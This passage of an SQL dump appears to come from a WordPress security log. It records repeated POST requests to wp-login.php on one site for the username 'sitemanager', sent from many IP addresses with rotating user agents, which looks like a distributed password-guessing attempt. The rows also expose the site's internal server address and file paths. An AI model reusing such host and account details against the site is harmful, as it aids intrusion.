Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59252\";s:11:\"REMOTE_ADDR\";s:13:\"68.65.122.143\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"115\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745970790.7148881;s:12:\"REQUEST_TIME\";i:1745970790;}}','68.65.122.143',0,'2025-04-30 05:23:12','1970-01-01 00:00:00'),(94423,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_USER_AGENT\";s:119:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/614.31.14 (KHTML, like Gecko) Version/17.0.96 Safari/614.31.14\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54124\";s:11:\"REMOTE_ADDR\";s:13:\"15.204.43.173\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745971419.9117551;s:12:\"REQUEST_TIME\";i:1745971419;}}','15.204.43.173',0,'2025-04-30 05:33:41','1970-01-01 00:00:00'),(94424,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_USER_AGENT\";s:112:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59660\";s:11:\"REMOTE_ADDR\";s:12:\"37.187.26.72\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745971731.7508709;s:12:\"REQUEST_TIME\";i:1745971731;}}','37.187.26.72',0,'2025-04-30 05:38:53','1970-01-01 00:00:00'),(94425,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"47800\";s:11:\"REMOTE_ADDR\";s:14:\"185.232.41.148\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745972046.73246;s:12:\"REQUEST_TIME\";i:1745972046;}}','185.232.41.148',0,'2025-04-30 05:44:08','1970-01-01 00:00:00'),(94426,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:15:\"HTTP_USER_AGENT\";s:128:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60350\";s:11:\"REMOTE_ADDR\";s:13:\"66.29.141.204\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745972363.3643489;s:12:\"REQUEST_TIME\";i:1745972363;}}','66.29.141.204',0,'2025-04-30 05:49:25','1970-01-01 00:00:00'),(94427,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Edg/112.0.1722.68\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56890\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.114.18\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745972671.2923789;s:12:\"REQUEST_TIME\";i:1745972671;}}','198.54.114.18',0,'2025-04-30 05:54:33','1970-01-01 00:00:00'),(94428,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"40086\";s:11:\"REMOTE_ADDR\";s:14:\"103.90.232.143\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745972982.6225491;s:12:\"REQUEST_TIME\";i:1745972982;}}','103.90.232.143',0,'2025-04-30 05:59:44','1970-01-01 00:00:00'),(94429,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"33608\";s:11:\"REMOTE_ADDR\";s:13:\"54.36.209.164\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745973296.9034491;s:12:\"REQUEST_TIME\";i:1745973296;}}','54.36.209.164',0,'2025-04-30 06:04:58','1970-01-01 00:00:00'),(94430,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56702\";s:11:\"REMOTE_ADDR\";s:12:\"31.172.67.59\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745973610.3401201;s:12:\"REQUEST_TIME\";i:1745973610;}}','31.172.67.59',0,'2025-04-30 06:10:12','1970-01-01 00:00:00'),(94431,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"120\";s:15:\"HTTP_USER_AGENT\";s:135:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Edg/115.0.1901.203\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"34360\";s:11:\"REMOTE_ADDR\";s:15:\"199.188.201.172\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"120\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745974226.910846;s:12:\"REQUEST_TIME\";i:1745974226;}}','199.188.201.172',0,'2025-04-30 06:20:28','1970-01-01 00:00:00'),(94432,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53700\";s:11:\"REMOTE_ADDR\";s:14:\"113.36.242.229\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745974537.6237659;s:12:\"REQUEST_TIME\";i:1745974537;}}','113.36.242.229',0,'2025-04-30 06:25:39','1970-01-01 